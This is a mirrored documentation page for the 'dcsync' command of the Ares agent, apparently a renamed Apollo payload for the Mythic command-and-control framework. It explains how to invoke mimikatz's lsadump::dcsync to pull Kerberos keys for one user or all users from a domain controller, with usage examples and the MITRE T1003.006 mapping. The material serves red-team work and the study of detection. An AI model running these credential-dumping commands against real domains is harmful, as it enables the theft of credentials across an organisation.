Ares-mythic/documentation-payload/ares/commands/dcsync.md at 9f0471b6825e98cf7befb4685240c0c582079467

mirror of https://github.com/Aryma-f4/Ares-mythic.git synced 2026-06-12 23:34:12 +00:00

Files

Aryma 03d283cf49 refactor(payload): rename apollo to ares and update documentation

This commit renames the Apollo payload type to Ares, moving all associated files and updating documentation accordingly. The change includes:
- Renaming directories from `apollo` to `ares`
- Updating documentation image references
- Maintaining the same code functionality while changing the payload name
- Adding new Ares-specific documentation files
- Removing old Apollo documentation files

The rename is done to reflect the new payload name while preserving all existing functionality.

2026-04-14 14:02:44 +07:00

799 B

Raw Blame History

+++ title = "dcsync" chapter = false weight = 103 hidden = false +++

{{% notice info %}} Artifacts Generated: Process Create, Process Inject, Process Kill {{% /notice %}}

Summary

Use mimikatz's lsadump::dcsync module to retrieve a user's kerberos keys from a Domain Controller.

Arguments

Domain

Domain to query information from.

User (Optional)

Username to sync kerberos keys for. Default is all users.

DC (Optional)

Domain controller to sync credential material from.

Usage

dcsync -Domain domain.local [-User username -DC dc.domain.local]

Example

dcsync -Domain contoso.local -User djhohnstein -DC 10.120.30.204
dcsync -Domain contoso.local

MITRE ATT&CK Mapping

T1003.006

Resrouces

mimikatz

799 B Raw Blame History